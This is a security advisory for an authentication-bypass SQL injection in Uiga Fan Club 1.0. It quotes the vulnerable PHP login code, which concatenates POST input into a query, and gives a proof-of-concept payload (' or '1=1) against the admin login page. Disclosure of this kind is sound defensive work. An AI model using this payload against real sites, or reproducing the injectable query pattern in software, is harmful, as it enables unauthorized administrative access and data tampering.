Uiga Fan Club 1.0 remote SQL injection vulnerability

2010-03-01 / 2010-03-02
Credit: cr4wl3r
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Uiga Fan Club <= 1.0 (Auth Bypass) SQL Injection Vulnerability ########################################################################### # Author: cr4wl3r # Download: http://www.scriptdevelopers.net/download/uigafanclub.zip ########################################################################### #if (isset($_POST['admin_name'])) # { # $admin_name=$_POST['admin_name']; # $admin_password=$_POST['admin_password']; # # # if(empty($admin_name)) # { # $errorMessage=warning."&nbsp;Username is empty!"; # } # elseif(empty($admin_password)) # { # $errorMessage=warning."&nbsp;Password is empty!"; # } # # # else # { # $sql="SELECT * # FROM admin # WHERE admin_name='$admin_name' and admin_password='$admin_password'"; # ########################################################################### ############################################### PoC: [path]/admin/admin_login.php Username: ' or '1=1 password: ' or '1=1 ###############################################

References:

http://www.exploit-db.com/exploits/11593
http://packetstormsecurity.org/1002-exploits/uigafanclub-sql.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top